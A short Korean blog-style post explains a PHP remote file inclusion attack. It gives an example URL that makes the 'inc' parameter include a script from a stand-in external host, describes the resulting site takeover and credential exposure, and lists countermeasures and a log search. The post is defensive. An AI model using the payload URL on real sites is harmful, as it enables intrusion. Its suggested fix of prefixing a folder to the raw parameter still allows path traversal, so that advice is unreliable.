해킹방법

• 본래 URL : http://xxxx.com/index.php?inc=menu/step2.php
• 해킹시도 URL : http://xxxx.com/index.php?inc=http://yyyy.com/hack.txt

설명

• GET 인자로 inc가 include하는 페이지를 나타내는 경우
  본래 페이지 대신에 http://yyyy.com/hack.txt 가 include되어서 동작한다.

피해

• hack.txt가 악의적으로 만들어진 스크립트를 포함할 경우 그 스크립트가 웹상에서 실행되어 핵커는 홈페이지를 마음대로 제어하게 된다.
• 핵커는 홈페이지에 사용된 변수 속에서 계정 아이디,비밀번호 또는 DB 아이디, 비밀번호를 알아낼 수 있을 것이다.

대책

• 위 방법은 PHP 4.3.x 이상으로 PHP를 업그레이드 하면 대부분 막을 수 있다.
• GET 인자로 include하는 페이지의 url을 받아오지 않는다.
  꼭 받아야할 경우 지정된 폴더를 뺀 url을 받고 PHP안에서 그 url을 포함시켜서 처리한다.
• ex>
  ?inc=step2.php
  PHP안에서는
  $inc = 'menu2/'.$_GET['inc'];
  처럼 처리
• 카운터에서 의심스런 접근이 없는지 확인한다.
  카운터의 DB에서 접근 페이지를 %?%http://% 처럼 검색해보기 바란다.

P.S

• 카운터 뒤지던 중 하도 저런 접근이 많아서(약 80 회) 한번 적어봅니다.
• 언제나 "공대여자는 이쁘다"는 마음가짐을 가지세요.